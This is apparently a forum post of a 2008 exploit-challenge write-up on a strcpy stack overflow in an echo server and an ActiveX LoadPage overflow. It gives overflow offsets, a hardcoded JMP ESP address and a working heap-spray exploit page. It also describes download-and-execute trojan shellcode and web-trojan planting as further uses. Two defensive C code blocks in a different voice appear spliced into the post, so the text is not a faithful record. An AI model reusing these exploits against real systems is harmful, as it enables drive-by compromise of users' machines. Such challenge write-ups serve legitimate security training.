[Original] My answers to problems A and B of the ExploitMe challenge.....
2008-1-2 10:19
Everything here is copied from the Word document in the submission area; my skill level is poor, so experts please don't laugh.
Tidying it up is really tedious... I'm still used to just dumping it all into Word.
Problem 1:
PE analysis:
Exploit_me_A.exe is a network service program with a buffer overflow vulnerability. It accepts client connection requests, receives the data the client sends, and the service echoes it back, similar to echo.
Vulnerability description
Vulnerability analysis:
Through dynamic and static reverse analysis, the problematic function can be located at sub_401000; internally it calls strcpy(...), a high-risk function for buffer overflows.
.text:00401000 sub_401000 proc near ; CODE XREF: _main+1A0p
.text:00401000
.text:00401000 var_C8 = byte ptr -0C8h
.text:00401000 arg_0 = dword ptr 4
.text:00401000
.text:00401000 sub esp, 0C8h ; allocate a 200-byte buffer
.text:00401006 or ecx, 0FFFFFFFFh
.text:00401009 xor eax, eax
.text:0040100B lea edx, [esp+0C8h+var_C8]
.text:0040100F push esi
.text:00401010 push edi
.text:00401011 mov edi, [esp+0D0h+arg_0]
.text:00401018 push offset asc_40904C ; "********************"
.text:0040101D repne scasb
.text:0040101F not ecx
.text:00401021 sub edi, ecx
.text:00401023 mov eax, ecx
.text:00401025 mov esi, edi
.text:00401027 mov edi, edx
.text:00401029 shr ecx, 2
.text:0040102C rep movsd ; the overflowing strcpy
.text:0040102E mov ecx, eax
.text:00401030 and ecx, 3
..........................
Restored as C pseudocode
int __cdecl sub_401000(int a1)
{
.......
strcpy(&v5, (const char *)a1);
ostream__operator__((int)&dword_409A68, (int)"********************");
v2 = ostream__operator__(10);
sub_4012B0(v2, (int)sub_4012D0);
.......
}
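As an added illustration of the pattern in sub_401000 (my code, not from the challenge binary or the submission): the unsafe handler reproduces the listing's strcpy() into a 200-byte stack buffer, and beside it is a bounded copy that rejects any input that would not fit; the function names and the test helper are mine.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* sub esp, 0C8h in the listing: a 200-byte stack buffer. */
#define ECHO_BUF_SIZE 200

/* The pattern from sub_401000: strcpy() from attacker-controlled data into a
 * fixed stack buffer with no length check. Once strlen(input) reaches 200 the
 * copy runs past the buffer into the saved registers and return address.
 * Shown for comparison only; nothing below calls it. */
void echo_unsafe(const char *input)
{
    char buf[ECHO_BUF_SIZE];
    strcpy(buf, input);            /* unbounded copy: the bug */
    printf("%s\n", buf);
}

/* Bounded replacement for the copy. Copies src (with its NUL) into dst only
 * if it fits in dstsz bytes; otherwise copies nothing and returns -1 so the
 * caller can reject the request. Returns the string length on success.
 * The length scan itself is bounded, so an unterminated input cannot make
 * it read past dstsz bytes of src. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n == dstsz)                /* no room for the terminator: refuse */
        return -1;
    memcpy(dst, src, n + 1);
    return (int)n;
}

/* Hardened handler: same 200-byte frame, but oversize input is dropped
 * instead of overflowing. Returns bytes echoed, or -1 when rejected. */
int echo_safe(const char *input)
{
    char buf[ECHO_BUF_SIZE];
    int n = copy_bounded(buf, sizeof buf, input);
    if (n < 0)
        return -1;
    printf("%s\n", buf);
    return n;
}

/* Exercise the boundary with a constructed input of len 'A' bytes.
 * 199 bytes is the largest string the frame can hold; 200 is where
 * the original strcpy() starts clobbering the stack. */
int echo_safe_with_len(size_t len)
{
    char tmp[512];
    if (len >= sizeof tmp)
        return -2;
    memset(tmp, 'A', len);
    tmp[len] = '\0';
    return echo_safe(tmp);
}
```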
Constructing the exploit program:
Step 1: Confirm that the vulnerability exists. Sending oversized data crashes the server, as shown in the figure below, which basically confirms a buffer overflow vulnerability in the server. Code: see test.cpp
Step 2: Construct a patterned string and locate the overflow point by calculation. Code: see test.cpp
Calculation: (0x55-0x41) in decimal * 10 + (0x41-0x41) in decimal = 200
Step 3: Verify that the overflow point is correct. As shown in the figure, 42424242 is the hex for BBBB
Step 4: Build the POC so that the host running the vulnerable program executes the specified shellcode, as shown in the figure. Code: see poc.cpp
Shellcode description:
/* failwest's dedicated shellcode; pops up a dialog: MessageBox(NULL,"failwest","failwest",0) */
Exploit run screenshot
Stability and generality argument
Nothing to say about the shellcode: it's built from a general-purpose shellcode, failwest's own, and trustworthy!
The test platform is Windows XP SP2 Chinese edition; it's a typical stack overflow, using the universal JMP ESP address for the Chinese edition, 7ffa4512.
Taking the two points above together, the problem A overflow can be called stable + general!
Innovation argument (optional)
None... -_-
Problem 2:
Vulnerability location:
For ActiveX control vulnerabilities, my first choice is fuzzing, and for fuzzing ActiveX the natural choice is COMRaider, the COM fuzzing tool from iDefense Labs.
Because of the competition, and since it only required finishing one vulnerability, I had COMRaider test some of the member functions of exploit_me_B.dll on a guess. The function GetRemoteFileTime was easily fuzzed out as having an overflow vulnerability.
Below, the vulnerable function Sub LoadPage (ByVal URL As String, ByVal x As Long, ByVal y As Long, ByVal Zoom As Single) is used as the example
Verifying that the vulnerability exists
<!-- test.html -->
<html>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='Crash'></object>
<input language=JavaScript onclick=CrashMe() type="button" value="CrashMe^_^">
<script language="JavaScript">
function CrashMe()
{
var buffer = "a";
while (buffer.length < 500) buffer += buffer;
//while (buffer.length < 256) buffer += 'b'; buffer += 'aaaa'; overflow point
var a=1;
var b=1;
var c=1;
Crash.LoadPage(buffer,a,b,c);
}
</script>
</html>
Vulnerability description and impact analysis:
From the preliminary test above it can be estimated that the LoadPage function triggers a stack overflow. Besides LoadPage, functions such as DownLoad and GetRemoteFileTime have this overflow vulnerability too; if exploited maliciously, e.g. for planting web trojans, the consequences would be very serious.
Analysis:
Use OllyIce attached to the IE browser to analyze this vulnerable function: attach OD to IE, then open test.html in IE
After clicking OK, use Shift+F7/F8/F9 to ignore the exceptions.. EIP is overwritten with "aaaa", i.e. 61616161
It's easy to locate LoadPage's first overflow point at 256 bytes. The conventional stack exploitation method of nop+jmpesp+nop+shellcode could basically be used, but here, to improve generality and stability, heap spray is used instead.
Exploitation; for the full code see calc_exploit.html
<html>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<body>
<script language="JavaScript">
var shellcode = ... // see the shellcode description section
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<600;i++) memory[i] = block + shellcode;
var buffer = unescape("%0D");
while (buffer.length< 300) buffer+=unescape("%0D");
var a=1;
var b=1;
var c=1;
target.LoadPage(buffer,a,b,c);
</script>
</body>
</html>
Other uses:
After the calculator-running poc executes successfully, it's basically certain this vulnerability can be exploited further: by swapping in the needed shellcode, other attack goals can be achieved. The most common, for example, is planting a web trojan on a compromised server (download-and-execute shellcode), or add-user shellcode, or writing a script to open 3389 on the target host; email and QQ can both become channels for spreading it, and nastier still, formatting someone else's disk, etc..
Below, only the web trojan is taken as an example:
Usually a malicious attacker embeds the web trojan in pages on servers they already control, so that when a user visits a page on that web server the embedded web trojan quietly runs along with it; if the user's machine happens to have a vulnerable control like the one in problem B installed, it will be infected with the trojan.
A simulated web-trojan generator ultimately produces exp_troan.html; that is the web trojan described above. For details see the submitted code.
Shellcode description
/* This shellcode comes from the internet and is used for poc testing; on success it runs the calculator */
/* This shellcode comes from the internet, modified into Unicode shellcode; on success it downloads a trojan from the specified server and runs it. By default it downloads the file http://127.0.0.1/cmd.exe from a server I set up myself */
// Note: whatever the server-side trojan program is named, this shellcode downloads the file to the C drive and renames it U.exe. To check whether the trojan was downloaded and executed, open Task Manager; see the exploit run screenshot
Before transformation:
After transformation:
Transformation function:
Exploit run screenshot
Stability and generality argument
Using heap spray, the nops and shellcode are laid out across several consecutive heap blocks, and the overflow point is then overwritten with a heap block address. This way execution easily reaches the shellcode; compared with the traditional jmpesp+shellcode method it is more stable and general, with no need to consider whether a universal jmp esp or jmp ebx exists.
In heap overflows, sometimes addresses such as 0x0d0d0d0d or 0x0c0c0c0c are already occupied by the program, so it is impossible to slide down to the shellcode; special attention is needed. But this problem is a stack overflow, so that does not affect its stability!
So the generality and stability of this program's exploit are fairly good.
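From the analyst's side of the two things shown above (the byte-array and unescape() forms of the same shellcode, and the heap spray block), an added example that is not part of the submission: a decoder that turns %uXXXX strings back into raw bytes, and a NOP-sled ratio check that a page scanner can apply to the result; the sample string is constructed here, not taken from the page.

```c
#include <stddef.h>

/* Value of one hex digit, or -1 for a non-hex character. */
static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode a string made only of JavaScript %uXXXX units into raw bytes.
 * unescape("%uXXXX") yields one UTF-16 code unit, which lands in memory
 * low byte first, so "%u3412" -> 12 34: that is the relation between the
 * byte-array and unescape() forms of a shellcode. Returns the byte count,
 * or -1 on a malformed unit or when out is too small. */
int decode_u_escapes(const char *s, unsigned char *out, size_t outsz)
{
    size_t n = 0;
    while (*s) {
        if (s[0] != '%' || s[1] != 'u')
            return -1;
        int h[4];
        for (int i = 0; i < 4; i++) {
            h[i] = hexval(s[2 + i]);   /* a short final unit fails here */
            if (h[i] < 0)
                return -1;
        }
        if (n + 2 > outsz)
            return -1;
        out[n++] = (unsigned char)(h[2] * 16 + h[3]);   /* low byte */
        out[n++] = (unsigned char)(h[0] * 16 + h[1]);   /* high byte */
        s += 6;
    }
    return (int)n;
}

/* Percentage of 0x90 (NOP) bytes in a decoded blob. A spray block is
 * almost entirely sled, so a high value on a large string is a strong
 * heap-spray signal; the threshold is up to the analyst. */
int nop_percent(const unsigned char *buf, size_t len)
{
    size_t nops = 0;
    if (len == 0)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x90)
            nops++;
    return (int)(nops * 100 / len);
}

/* Constructed sample (not from the page): eight NOPs followed by the text
 * "ABCD", written as little-endian %u units the way a spray page would. */
const char SAMPLE_ESCAPED[] = "%u9090%u9090%u9090%u9090%u4241%u4443";

/* Small wrappers so the decode result can be inspected byte by byte. */
int decoded_length(const char *s)
{
    unsigned char buf[256];
    return decode_u_escapes(s, buf, sizeof buf);
}

int decoded_byte_at(const char *s, size_t i)
{
    unsigned char buf[256];
    int n = decode_u_escapes(s, buf, sizeof buf);
    if (n < 0 || i >= (size_t)n)
        return -1;
    return buf[i];
}

int sample_nop_percent(void)
{
    unsigned char buf[64];
    int n = decode_u_escapes(SAMPLE_ESCAPED, buf, sizeof buf);
    if (n < 0)
        return -1;
    return nop_percent(buf, (size_t)n);
}
```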
Innovation argument (optional)
Sigh... none -_-
---------------------------------------------------------------------------------
Addendum
On the 31st, while celebrating New Year, I casually looked over my problem B and found I had forgotten to copy the code from OD into the document. I originally planned to resubmit a revision, but by then more than 20 had already been submitted, and I was worried I wouldn't get the speed points, since my submission was fairly early. Weighing it up: principle + methods I could think of + attack scenario + attack steps is 15 points, 15 divided by 4 is about 4, while speed can get 5 points. So I didn't resubmit.
I'm giving it here for everyone to look at; don't laugh
1001CD30 55 push ebp
1001CD31 8BEC mov ebp, esp
.........
1001CDA2 C606 00 mov byte ptr [esi], 0
1001CDA5 FF15 F4900C10 call dword ptr [<&KERNEL32.WideCharToMultiByte>] ; kernel32.WideCharToMultiByte
1001CDAB 56 push esi
1001CDAC 8BCB mov ecx, ebx
1001CDAE E8 1D8DFFFF call 10015AD0 ; //F7 step into
1001CDB3 8D65 F4 lea esp, dword ptr [ebp-C]
1001CDB6 33C0 xor eax, eax
---------------------------------------------------------------------------------
10015AD0 8B4424 04 mov eax, dword ptr [esp+4]
.....
10015ADA C786 64400000 0>mov dword ptr [esi+4064], 0
10015AE4 E8 27D2FFFF call 10012D10 ; //F7 step into
......
10015AF1 C2 0400 retn 4
----------------------------------------------------------------------------------
10012D10 81EC 04030000 sub esp, 304
............
10012D9F E8 1C100000 call 10013DC0 ; //F7 step into
10012DA4 8B85 78270000 mov eax, dword ptr [ebp+2778]
10012DAA 899D 84270000 mov dword ptr [ebp+2784], ebx
-----------------------------------------------------------------------------------
10013DC0 81EC 0C010000 sub esp, 10C
.....
10013DE7 C1E9 02 shr ecx, 2
10013DEA F3:A5 rep movs dword ptr es:[edi], dword ptr [esi] ; //overflow
10013DEC 8BC8 mov ecx, eax
10013DEE 8B82 943F0000 mov eax, dword ptr [edx+3F94]
10013DF4 83E1 03 and ecx, 3
10013DF7 83F8 01 cmp eax, 1
10013DFA F3:A4 rep movs byte ptr es:[edi], byte ptr [esi] ; //overflow
10013DFC 0F85 18010000 jnz 10013F1A ; //it jumps here, and then it's over
.............
10013F1A 5F pop edi ; 0013B460
10013F1B 5E pop esi
10013F1C 32C0 xor al, al
10013F1E 5B pop ebx
10013F1F 81C4 0C010000 add esp, 10C
10013F25 C2 0800 retn 8
Restored as C pseudocode (via F5)
memcpy((void *)Str1, v16, 4 * v14);
v17 = (char *)v16 + 4 * v14;
v18 = (void *)&Str1[4 * v14];
LOBYTE(v14) = v15;
v19 = *(_DWORD *)(v3 + 16276);
memcpy(v18, v17, v14 & 3);
----------------------------------------------------------------------------------
I just forgot to upload the test code.... adding it now. For the problem B web trojan you can set up your own server to test, or upload the test exe file to your own hosting space to test, etc.